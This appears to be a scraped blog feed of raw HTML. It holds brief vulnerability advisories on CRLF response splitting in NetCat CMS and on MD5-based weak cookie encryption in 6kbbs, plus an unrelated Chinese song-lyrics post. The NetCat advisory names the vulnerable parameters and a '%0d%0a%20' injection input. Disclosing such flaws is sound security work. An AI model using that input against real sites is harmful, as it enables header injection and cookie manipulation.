<span style="font-family: Arial, Helvetica, sans-serif;">NetCat web application has a computer security bug problem. It can be exploited by HTTP Response Splitting (CRLF) attacks. This could allow a remote attacker to insert arbitrary HTTP headers, which are included in a response sent to the server. If an application does not properly filter such a request, it could be used to inject additional headers that manipulate cookies, authentication status, or more.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">Several other similar products 0-day vulnerabilities have been found by some other bug hunter researchers before. NetCat has patched some of them. CXSECurity is a huge collection of information on data communications safety. Its main objective is to inform about errors in various applications. It also publishes suggestions, advisories, solutions details related to CRLF vulnerabilities and cyber intelligence recommendations.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1) </b>The first code flaw occurs at "/post.php" page with "redirect_url" parameter by adding "%0d%0a%20".</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.2)</b> The second code flaw occurs at "redirect.php?" page with "url" parameter by adding "%0d%0a%20".</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><b>References:</b><br /><a href="http://www.osvdb.org/show/osvdb/119342">http://www.osvdb.org/show/osvdb/119342</a></span><br />
<a href="http://www.osvdb.org/show/osvdb/119343"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.osvdb.org/show/osvdb/119343</span></a><br />
<a href="http://lists.openwall.net/full-disclosure/2015/03/07/3"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/03/07/3</span></a><br />
<a href="http://seclists.org/fulldisclosure/2015/Mar/36"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2015/Mar/36</span></a><br />
<a href="http://marc.info/?l=full-disclosure&m=142576233403004&w=4"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://marc.info/?l=full-disclosure&m=142576233403004&w=4</span></a><br />
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01768.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01768.html</span></a><br />
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1676"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1676</span></a><br />
<div>
<a href="http://securityrelated.blogspot.com/2015/03/netcat-cms-multiple-http-response.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/03/netcat-cms-multiple-http-response.html</span></a><br />
<a href="http://essayjeans.blog.163.com/blog/static/23717307420155142423197/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://essayjeans.blog.163.com/blog/static/23717307420155142423197/</span></a><br />
<a href="http://computerobsess.blogspot.com/2015/06/osvdb-119342-netcat-crlf.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://computerobsess.blogspot.com/2015/06/osvdb-119342-netcat-crlf.html</span></a><br />
<a href="http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/bugs/netcat-cms-crlf</span></a><br />
<a href="http://tetraph.blog.163.com/blog/static/234603051201551423749286/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blog.163.com/blog/static/234603051201551423749286/</span></a><br />
<a href="https://webtechwire.wordpress.com/2015/03/14/osvdb-119342-netcat-crlf/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://webtechwire.wordpress.com/2015/03/14/osvdb-119342-netcat-crlf/</span></a><br />
<a href="https://itswift.wordpress.com/2015/03/07/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://itswift.wordpress.com/2015/03/07/netcat-cms-multiple-http-re</span></a><br />
<a href="http://tetraph.com/security/http-response-splitting-vulnerability/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/http-response-splitting-vulnerability/netcat-cms-multiple</span></a><br />
<a href="http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-89438061877751708482015-06-13T23:07:00.001-07:002015-06-13T23:11:53.579-07:00 6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-tOyOzdiWbxw/VX0aDDpKJ_I/AAAAAAAABC8/0olgl72x-nA/s1600/6kbbs_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://3.bp.blogspot.com/-tOyOzdiWbxw/VX0aDDpKJ_I/AAAAAAAABC8/0olgl72x-nA/s400/6kbbs_1.png" width="400" /></span></a></div>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities</span></b><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Exploit Title: 6kbbs Weak Encryption Web Security Vulnerabilities</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Vendor: 6kbbs</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Product: 6kbbs</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Vulnerable Versions: v7.1 v8.0</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Tested Version: v7.1 v8.0</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Advisory Publication: June 08, 2015</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Latest Update: June 10, 2015</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Vulnerability Type: Inadequate Encryption Strength [CWE-326]</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">CVE Reference: *</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">CVSS Severity (version 2.0):</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Discover and Reporter: Wang Jing [School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore] (<a href="https://twitter.com/justqdjing/status/608928069663850497">@justqdjing</a>)</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Recommendation Details:</span></b><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>(1) Vendor & Product Description:</b></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Vendor:</span></b><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">6kbbs</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Product & Vulnerable Versions:</span></b><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">6kbbs</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">v7.1</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">v8.0</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Vendor URL & download:</span></b><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">6kbbs can be gain from here,</span><br />
<a href="http://www.6kbbs.com/download.html"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://www.6kbbs.com/download.html</span></a><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Product Introduction Overview:</span></b><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">"6kbbs V8.0 is a PHP + MySQL built using high-performance forum, has the code simple, easy to use, powerful, fast and so on. It is an excellent community forum program. The program is simple but not simple; fast, small; Interface generous and good scalability; functional and practical pursuing superior performance, good interface, the user's preferred utility functions. Forum Technical realization (a) interface : using XHTML + CSS structure, so the structure of the page , easy to modify the interface ; save the transmission static page code , greatly reducing the amount of data transmitted over the network ; improve the interface scalability , more in line with WEB standards, support Internet Explorer, FireFox, Opera and other major browsers. (b) Program : The ASP + ACCESS mature technology , the installation process is extremely simple , the environment is also very common."</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">"(1) PHP version : (a) 6kbbs V8.0 start using PHP + MySQL architecture. (b) Currently ( July 2010 ) is still in the testing phase , 6kbbs V8.0 is the latest official release. (2) ASP Version: 6kbbs (6k Forum) is an excellent community forum process . The program is simple but not simple ; fast , small ; interface generous and good scalability ; functional and practical . pursue superiority , good interface , practical functions of choice for subscribers."</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Details:</span></b><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">6kbbs web application has a computer security problem. It can be exploited by weak encryption attacks. The software stores or transmits sensitive data using an encryption scheme that is theoretically sound, but is not strong enough for the level of protection required. A weak encryption scheme can be subjected to brute force attacks that have a reasonable chance of succeeding using current attack methods and resources.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Several 6kbbs products 0-day web cyber bugs have been found by some other bug hunter researchers before. 6kbbs has patched some of them. "The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers' right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here!" A great many of the web securities have been published here.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Source Code:</span></b><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><?php</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">if(empty($row)){</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> $extrow=$db->row_select_one("users","username='{$username}'");</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> if(!empty($extrow) && !empty($extrow['salt'])){</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> if(md5(md5($userpass).$extrow['salt'])==$extrow['userpass']){</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> $row=$extrow;</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> $new_row["userpass"]=$userpass_encrypt;</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> $new_row["salt"]="";</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> $db->row_update("users",$new_row,"id={$extrow['id']}");</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> }</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> }</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">}</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">?></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Source Code From:</span><br />
<a href="http://code.google.com/p/6kbbs/source/browse/trunk/convert/discuz72/loginext.php?r=16"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://code.google.com/p/6kbbs/source/browse/trunk/convert/discuz72/loginext.php?r=16</span></a><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">We can see that "userpass" stored in cookie was encrypted using "$userpass" user password directly. And there is no "HttpOnly" attribute at all. Since md5 is used for the encryption, it is easy for hackers to break the encrypted message.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">"The MD5 message-digest cryptography algorithm is a widely used cryptographic hash function producing a 128-bit (16-byte) hash value, typically expressed in text format as a 32 digit hexadecimal number. Papers about it have been published on Eurocrypt, Asiacrypt and Crypto. Meanwhile, researchers focusing on it spread in Computer Science, Computer Engineering, IEEE and Mathematics. MD5 has been utilized in a wide variety of cryptographic applications, and is also commonly used to verify data integrity. MD5 was designed by Ronald Rivest in 1991 to replace an earlier hash function, MD4. The source code in RFC 1321 contains a "by attribution" RSA license." (Wikipedia)</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">References:</span></b><br />
<a href="http://seclists.org/fulldisclosure/2015/Jun/34"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2015/Jun/34</span></a><br />
<a href="http://lists.openwall.net/full-disclosure/2015/06/11/6"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/06/11/6</span></a><br />
<a href="http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=143405936018977&w=2"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure</span></a><br />
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg02160.html"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg02160.html</span></a><br />
<a href="https://packetstormsecurity.com/files/132270/6kbbs-7.1-8.0-Weak-Cryptography.html"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">https://packetstormsecurity.com/files/132270/6kbbs-7.1-8.0-Weak-Cryptography.html</span></a><br />
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/2092"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/2092</span></a><br />
<a href="http://tetraph.blog.163.com/blog/static/234603051201551415853846/#"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blog.163.com/blog/static/234603051201551415853846/#</span></a><br />
<a href="http://essaybeans.blogspot.com/2015/06/6kbbs-v80-weak-encryption-cryptography.html"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://essaybeans.blogspot.com/2015/06/6kbbs-v80-weak-encryption-cryptography.html</span></a><br />
<a href="https://mathfas.wordpress.com/2015/06/14/6kbbs-weak-encryption/"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">https://mathfas.wordpress.com/2015/06/14/6kbbs-weak-encryption/</span></a><br />
<a href="http://tetraph.com/security/weak-encryption/6kbbs-v8-0-weak-encryption/"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/weak-encryption/6kbbs-v8-0-weak-encryption/</span></a><br />
<a href="http://securityrelated.blogspot.com/2015/06/6kbbs-v80-weak-encryption-cryptography.html"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/06/6kbbs-v80-weak-encryption-cryptography.html</span></a><br />
<a href="https://vulnerabilitypost.wordpress.com/2015/06/11/6kbbs-v8-0-weak-encryption/"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">https://vulnerabilitypost.wordpress.com/2015/06/11/6kbbs-v8-0-weak-encryption/</span></a><br />
<a href="http://www.inzeed.com/kaleidoscope/computer-security/6kbbs-v8-0-weak-encryption/"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/computer-security/6kbbs-v8-0-weak-encryption/</span></a><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<br />
<br />
<div>
</div>
<br />
<br />
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-18313284982334900012015-06-07T01:41:00.002-07:002015-06-07T02:10:01.008-07:00熱帶雨林 - S.H.E - 青春株式會社 柔美溫和華文歌曲<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-aA46stOLSaM/VXP_pMxl7DI/AAAAAAAAASo/U13aL9LQqaA/s1600/48.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="275" src="http://4.bp.blogspot.com/-aA46stOLSaM/VXP_pMxl7DI/AAAAAAAAASo/U13aL9LQqaA/s400/48.jpg" width="400" /></a></div>
<br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">高
中的時候,第壹次從同學那聽到這首歌,喜歡無比。如今,多年已過,物是人非,做壹視頻以自慰,紀念曾經的青春。"熱帶雨林"
采用柔美溫和的旋律,讓人容易回憶起往事,采用傷感又令人感動的歌詞,易引起聽眾的共鳴。歌曲通過三人的完美配合,表達出了青春期少男少女中感情受困如置
身夢境、迷失在熱帶雨林的感覺</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">音樂<br />所屬專輯: "青春株式會社"<br />歌曲原唱: SHE - 任家萱(Selina)、田馥甄(Hebe)、陳嘉樺(Ella)<br />填詞: 方文山<br />譜曲: 周傑倫</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">歌曲歌詞<br />冷風過境 回憶凍結成冰<br />我的付出全都要不到回音<br />悔恨就象是綿延不斷的丘陵<br />痛苦全方位的降臨<br />悲傷入侵<br />誓言下落不明我找不到那些愛過的曾經<br />妳象在寂寞上空盤旋的禿鷹<br />將我想妳啃食幹凈<br />月色搖晃樹影 穿梭在熱帶雨林<br />妳離去的原因 從來不說明<br />妳的謊象陷阱 我最後才清醒<br />幸福只是水中的倒影<br />月色搖晃樹影 穿梭在熱帶雨林<br />悲傷的雨不停 全身血淋淋<br />那深陷在沼澤 我不堪的愛情<br />是我無能為力的傷心<br />悲傷入侵 誓言下落不明<br />我找不到那些愛過的曾經<br />妳象在寂寞上空盤旋的禿鷹<br />將我想妳啃食幹凈<br />月色搖晃樹影 穿梭在熱帶雨林<br />妳離去的原因 從來不說明<br />妳的謊象陷阱 我最後才清醒<br />幸福只是水中的倒影<br />月色搖晃樹影 穿梭在熱帶雨林<br />悲傷的雨不停 全身血淋淋<br />那深陷在沼澤 我不堪的愛情<br />是我無能為力的傷心</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">制作: 谷雨 (Essayjeans) <a href="https://twitter.com/justqdjing/status/586520579353640960">@justqdjing</a><br />圖片: 來自網上<br /><a href="http://www.tetraph.com/blog/essayjeans/">http://www.tetraph.com/blog/essayjeans/</a><br /><br /></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /><br />視頻地址: <a href="https://www.youtube.com/watch?v=VNi6oIf_u3Y">https://www.youtube.com/watch?v=VNi6oIf_u3Y</a><br />歌詞鏈接: <a href="http://essayjeans.blog.163.com/blog/static/23717307420155744626301/">http://essayjeans.blog.163.com/blog/static/23717307420155744626301/</a><br />推特: <a href="https://twitter.com/essayjeans/status/607468881662214144">https://twitter.com/essayjeans/status/607468881662214144</a><br />樂乎: <a href="http://aibiyi.lofter.com/post/1cc9f4e9_735dd83">http://aibiyi.lofter.com/post/1cc9f4e9_735dd83</a><br />湯博樂: <a href="http://canghaixiao.tumblr.com/post/120922254507">http://canghaixiao.tumblr.com/post/120922254507</a><br />谷歌+: <a href="https://plus.google.com/u/0/+essayjeans/posts/HrzASc1VcG6">https://plus.google.com/u/0/+essayjeans/posts/HrzASc1VcG6</a><br />非死不可: <a href="https://www.facebook.com/essayjeans/posts/840142132743607">https://www.facebook.com/essayjeans/posts/840142132743607</a></span><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-61632776496442788502015-06-06T20:38:00.000-07:002015-06-06T20:38:42.054-07:00CVE-2014-8753 Cit-e-Net Multiple XSS (Cross-Site Scripting) Web Security Vulnerabilities<div>
<div>
<div>
<div>
<div class="separator" style="clear: both; text-align: center;">
